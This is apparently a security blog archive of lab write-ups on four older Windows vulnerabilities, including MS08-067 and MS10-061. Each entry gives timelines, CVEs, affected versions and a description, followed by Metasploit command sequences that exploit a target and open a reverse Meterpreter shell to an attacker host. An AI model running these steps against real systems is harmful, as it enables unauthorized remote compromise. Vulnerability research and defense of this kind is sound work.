Tag Archives: Windows

MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Timeline :

Milw0rm PoC provided by stephen lawler the 2008-10-23
Metasploit PoC provided by hdm the 2009-10-28
Microsoft patch “KB958644” provided the 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the StuxNet worm
Security update released by Microsoft (KB2347290) the 2010-09-14
Metasploit PoC released the 2010-09-17

    PoC provided by :

jduck
hdm

    Reference(s) :

CVE-2010-2729
MS10-061

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

    Tested on Windows XP SP3

    Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

    Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

Microsoft WMI Administration Tools ActiveX Buffer Overflow

Timeline :

Vulnerability & PoC disclosed by WooYun the 2010-12-22
Metasploit PoC provided the 2010-12-22

    PoC provided by :

WooYun
MC
jduck

    Reference(s) :

CVE-2010-3973
CVE-2010-4588

    Affected version(s) :

Microsoft WMI Administrative Tools 1.1

    Tested on Windows XP SP3

    Description :

The 22 December WooYun, a security researcher, has disclose a vulnerability, accompanied by a PoC, for WMI Administrative Tools 1.1. These tools are not included by default in Microsoft Windows, and need to be additionally installed on Windows XP. The same day, Metasploit team has release a module to industrialize the exploitation of this vulnerability. This vulnerability is identified by CVE-2010-3973 and CVE-2010-4588. Actually they are no Microsoft planned patch.

    Commands :

use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1

sysinfo
ipconfig

MS11-006 : Windows Thumbnails CreateSizedDIBSECTION Stack Buffer Overflow

Timeline :

Vulnerability disclosed by Moti & Xu Hao on POC2010 the 2010-12-15
CVE registered the 2010-12-22
PoC provided by Metasploit team the 2011-01-04

    PoC provided by :

Moti & Xu Hao
Yaniv Miron aka Lament of ilhack
jduck

    Reference(s) :

CVE-2010-3970
MSA-2490606
MS11-006

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

    Tested on Windows XP SP3

    Description :

Microsoft is one more time victim of a uncoordinated disclosed vulnerability. Moti Joseph & Xu Hao, two security researchers, have reveal, the 15 December, during thePOC2010 conference, a new Microsoft Windows vulnerability. No attention on this vulnerability disclosure until  December 22 (CVE-2010-3970), despite conference schedule of POC2010 had clearly indicate that a new Microsoft Windows vulnerability would be revealed. Maybe this non attention is due that the conference was hold in South Korea ?

Again, shortly thereafter, the information on this vulnerability have circulated quickly in the world of computer security professionals, culminating today in a public PoC provided by the Metasploit team. The presentation, conducted by Moti Joseph & Xu Hao, during the POC2010 conference, is also available on Exploit-DB.
This vulnerability, that we can classified as critical, is fairly simple to exploit. When viewing the content of a directory containing a forged Word, or PowerPoint, document in “Thumbnails” mode, arbitrary code can be executed with the privileges of the local user. Exploitation of this vulnerability can also be done through SharePoint.

A few hours after the release of the Metasploit PoC, Microsoft issued an advisory, MSA-2490606, indicating  the vulnerable systems and providing mitigation solutions. Microsoft does not currently plan to provide an out of band patch to correct this vulnerability.

What is also interesting in the disclosure life cycle of this vulnerability is that the announcement of this conference was held September 13, 2010, and at that time the organizers were looking for people interested to present their work. The deadline for submission of paper (CFP) was announced for October 15, 2010. This would mean that this vulnerability had been known long before October 15, 2010. What is also to note is that Microsoft was a sponsor of this conference.

    Commands :

use exploit/windows/fileformat/ms11_006_crea­tesizeddibsection
set FILENAME msf.doc
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig